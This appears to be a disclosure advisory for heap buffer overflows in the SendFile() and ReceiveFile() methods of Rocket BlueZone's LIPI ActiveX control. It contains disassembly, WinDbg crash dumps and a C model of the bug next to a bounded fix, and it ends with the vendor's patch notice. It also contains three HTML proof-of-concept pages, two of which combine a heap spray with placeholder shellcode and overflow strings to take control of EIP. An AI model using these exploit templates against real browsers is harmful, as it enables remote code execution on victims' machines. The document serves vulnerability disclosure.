<Unloaded_ring.dll>+0xc0c0bfb:
0c0c0c0c 0c0c            or      al,0Ch

vulnerable code, bzlipiobj.dll:
;-------------------------------------------------------------------------------
100200E0 8D8510040000 lea eax,[ebp+00000410h]
100200E6 L100200E6:
100200E6 50 push eax
100200E7 8D83E28E0800 lea eax,[ebx+00088EE2h]
100200ED 50 push eax
100200EE FF15F8610210 call [KERNEL32.dll!lstrcatA]
100200F4 EB75 jmp L1002016B
;-------------------------------------------------------------------------------

To reach the call, browse sendfile_crash.html (the first proof of concept below, with the UserName and Password lines commented out): a login box is shown. Set a breakpoint on KERNEL32!lstrcatA, then click OK.
Proof of Concept
<html>
<object classid='clsid:0EB961C3-A2D0-11D5-903D-10105AABADD3' id='obj' />
</object>
<script>
// credentials left unset on purpose: the login box appears, which gives
// time to place the breakpoint on lstrcatA before clicking OK
//obj.UserName = "aaaaaaaa";
//obj.Password = "bbbbbbbb";
// 60000-byte filename, appended unchecked to the LIPI object's buffer
bof = "";
for (i=0; i<15000; i++){
  bof = bof + "!!!!";
}
obj.SendFile(bof,"");
</script>
</html>
<html>
<body>
<object classid='clsid:0EB961C3-A2D0-11D5-903D-10105AABADD3' id='obj' />
</object>
<div id=blah></div>
<script>
var div_container = document.getElementById("blah");
div_container.style.cssText = "display:none";
var data;
offset = 0x100;
// heap spray: 0x600 button title strings filled with 0x0c0c0c0c, each
// carrying a placeholder "rop" and "shellcode" (0x41414141) at the offset
junk = unescape("%u0c0c%u0c0c");
while (junk.length < 0x1000) junk += junk;
rop = unescape("%u4141%u4141");
shellcode = unescape("%u4141%u4141");
data = junk.substring(0,offset) + rop + shellcode;
data += junk.substring(0,0x800-offset-rop.length-shellcode.length);
while (data.length < 0x80000) data += data;
for (var i = 0; i < 0x600; i++) {
  var x = document.createElement("button");
  x.title = data.substring(0,0x40000-0x58);
  div_container.appendChild(x);
}
// credentials set so no login dialog blocks the call
obj.UserName = "aaaaaaaa";
obj.Password = "bbbbbbbb";
// 60000-byte filename, appended unchecked to the LIPI object's buffer
bof = "";
for (i=0; i<15000; i++){
  bof = bof + "!!!!";
}
obj.SendFile(bof,"");
</script>
</body>
</html>
LIPI ActiveX Control ReceiveFile Method Heap Buffer Overflow Vulnerability
Rocket BlueZone installs an ActiveX control with the following settings:
binary path: C:\Program Files\BlueZone\6.1\bzlipiobj.dll
progid: BlueZone.LIPI.6.1
clsid: {0EB961C3-A2D0-11D5-903D-10105AABADD3}
implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): true
Safe for Initialization (IObjectSafety): True
description: LIPI Class
According to the IObjectSafety interface the control is marked safe for scripting and safe for initialization, so Internet Explorer allows the object's methods and properties to be scripted from a web page, subject to the browser's security zone settings. Note that these ActiveX settings are the same as those of common web browser plugins (Flash, QuickTime, etc.).
Vulnerability
The control exposes the ReceiveFile() method; from the typelib:

...
/* DISPID=1 */
/* VT_I4 [3] */
function ReceiveFile(
    /* VT_BSTR [8] [in] */ $__MIDL_0011,   <------------------------------
    /* VT_BSTR [8] [in] */ $__MIDL_0012
)
{
    /* method ReceiveFile */
}
...
As in SendFile(), the first argument, the filename, ends up in a stack buffer at [ebp+410h] and is then appended with lstrcatA() to a fixed-size buffer inside the heap-allocated LIPI object (lpString2 = [ebp+410h] is the source, lpString1 = ebx+88EE2h the destination) with no length check, so a long filename overwrites whatever follows that buffer on the heap.

Note that the UserName and Password properties must be set first; otherwise a login dialog is displayed before the vulnerable call is reached.
When browsing receivefile.html (the proof of concept below), WinDbg shows:

eax=0c0c0c0c ebx=030a9006 ecx=0c0c0c0c edx=0c0c0c0b esi=030a9006 edi=0c0c0c0c
eip=0c0c0c0c esp=015ec890 ebp=015ec8a4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
<Unloaded_ring.dll>+0xc0c0bfb:
0c0c0c0c 0c0c            or      al,0Ch

vulnerable code, bzlipiobj.dll:
;-------------------------------------------------------------------------------
1001F94D 8D8510040000 lea eax,[ebp+00000410h]
1001F953 L1001F953:
1001F953 50 push eax
1001F954 8D83E28E0800 lea eax,[ebx+00088EE2h]
1001F95A 50 push eax
1001F95B FF15F8610210 call [KERNEL32.dll!lstrcatA]
1001F961 EB75 jmp L1001F9D8
;-------------------------------------------------------------------------------
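Both LIPI bugs, SendFile() at 100200EE and ReceiveFile() at 1001F95B, are the same lstrcatA() into a fixed field of a heap object. The following is an added example written for this page, not BlueZone code: it models the object as one flat allocation so that the overrun is an in-bounds write in this program and the neighbouring field can be inspected afterwards, shows how a filename made of the spray byte 0x0c ends up in the pointer slot that follows the field (the eip=0c0c0c0c seen in the register dumps), and pairs it with an append that carries the field's capacity. The object layout, the 64-byte field and the pointer right after it are the editor's assumptions; the real object is far larger and its layout is not known. Little-endian host assumed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define OBJ_SIZE 128
#define PATH_OFF 16                       /* hypothetical offset of the filename field */
#define PATH_CAP 64                       /* hypothetical size of that field */
#define NEXT_OFF (PATH_OFF + PATH_CAP)    /* hypothetical 4-byte pointer right after it */

/* Flat stand-in for the LIPI object: a prefix already in the field and a
 * sentinel in the slot that follows it (think vtable or callback pointer). */
static void init_obj(uint8_t *obj)
{
    uint32_t sentinel = 0x11223344u;
    memset(obj, 0, OBJ_SIZE);
    memcpy(obj + PATH_OFF, "C:\\", 4);
    memcpy(obj + NEXT_OFF, &sentinel, 4);
}

/* lstrcatA semantics: find the NUL in dst, copy src and its NUL after it.
 * Nothing tells it where the field ends. */
static size_t lstrcat_model(uint8_t *dst, const char *src)
{
    size_t end = strlen((const char *)dst);
    size_t n = strlen(src);
    memcpy(dst + end, src, n + 1);
    return end + n;
}

/* strnlen without relying on the POSIX declaration. */
static size_t field_len(const char *s, size_t cap)
{
    size_t i = 0;
    while (i < cap && s[i] != '\0')
        i++;
    return i;
}

/* Hardened form: the field capacity is part of the call. Returns -1 and
 * leaves dst untouched when the result and its NUL would not fit. */
static int append_bounded(char *dst, size_t cap, const char *src)
{
    size_t end = field_len(dst, cap);
    size_t n = strlen(src);
    if (end >= cap || n + 1 > cap - end)
        return -1;
    memcpy(dst + end, src, n + 1);
    return (int)(end + n);
}

/* Constructed filename: n bytes of 0x0c, the value the PoC's spray fills the
 * heap with. */
static char *name_of_0c(size_t n)
{
    char *s = malloc(n + 1);
    memset(s, 0x0c, n);
    s[n] = '\0';
    return s;
}

/* Value found in the pointer slot after the unbounded append of an n-byte
 * name; 0xFFFFFFFF when n does not fit the model arena at all. */
uint32_t neighbour_after_unbounded(size_t n)
{
    uint8_t obj[OBJ_SIZE];
    uint32_t v;
    char *name;
    if (PATH_OFF + 3 + n + 1 > OBJ_SIZE)   /* arena limit of the model only */
        return 0xFFFFFFFFu;
    name = name_of_0c(n);
    init_obj(obj);
    lstrcat_model(obj + PATH_OFF, name);
    free(name);
    memcpy(&v, obj + NEXT_OFF, 4);
    return v;
}

/* Same input through the bounded append: 1 if accepted, 0 if refused. */
int bounded_accepts(size_t n)
{
    uint8_t obj[OBJ_SIZE];
    char *name = name_of_0c(n);
    int rc;
    init_obj(obj);
    rc = append_bounded((char *)(obj + PATH_OFF), PATH_CAP, name);
    free(name);
    return rc >= 0;
}

int main(void)
{
    printf("pointer slot after 10-byte name: %08x (intact)\n", neighbour_after_unbounded(10));
    printf("pointer slot after 61-byte name: %08x (the NUL clips its low byte)\n", neighbour_after_unbounded(61));
    printf("pointer slot after 70-byte name: %08x (spray value, as in the crash)\n", neighbour_after_unbounded(70));
    printf("bounded append of 60 / 61 bytes: %d / %d\n", bounded_accepts(60), bounded_accepts(61));
    return 0;
}
```

The 61-byte case is the one worth keeping in mind when reviewing this kind of code: a single terminator written one byte too far corrupts a pointer without any of the attacker's bytes landing in it.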
Proof of Concept
<html>
<body>
<object classid='clsid:0EB961C3-A2D0-11D5-903D-10105AABADD3' id='obj' />
</object>
<div id=blah></div>
<script>
var div_container = document.getElementById("blah");
div_container.style.cssText = "display:none";
var data;
offset = 0x100;
// heap spray: 0x600 button title strings filled with 0x0c0c0c0c, each
// carrying a placeholder "rop" and "shellcode" (0x41414141) at the offset
junk = unescape("%u0c0c%u0c0c");
while (junk.length < 0x1000) junk += junk;
rop = unescape("%u4141%u4141");
shellcode = unescape("%u4141%u4141");
data = junk.substring(0,offset) + rop + shellcode;
data += junk.substring(0,0x800-offset-rop.length-shellcode.length);
while (data.length < 0x80000) data += data;
for (var i = 0; i < 0x600; i++) {
  var x = document.createElement("button");
  x.title = data.substring(0,0x40000-0x58);
  div_container.appendChild(x);
}
// credentials set so no login dialog blocks the call
obj.UserName = "aaaaaaaa";
obj.Password = "bbbbbbbb";
// 60000-byte filename, appended unchecked to the LIPI object's buffer
bof = "";
for (i=0; i<15000; i++){
  bof = bof + "!!!!";
}
obj.ReceiveFile(bof,"");
</script>
</body>
</html>
Vendor Response
The vendor has responded that they have released a patch (2nd of September 2015) and commented that:
In addition to placing the BlueZone announcement on the Rocket Customer Portal, we have added the vulnerability announcement to our website.
You may find the information via this link on our BlueZone product page:
https://www.rocketsoftware.com/product-families/rocket-bluezone-passport
There is also a dedicated page for the announcement if someone does a search for it on the Rocket website:
https://www.rocketsoftware.com/rocket-bluezone-security-annoucement
The patch location is within Rocket’s Customer Portal, and is accessible by all affected customers.
Thanks again for your help and your notification to us.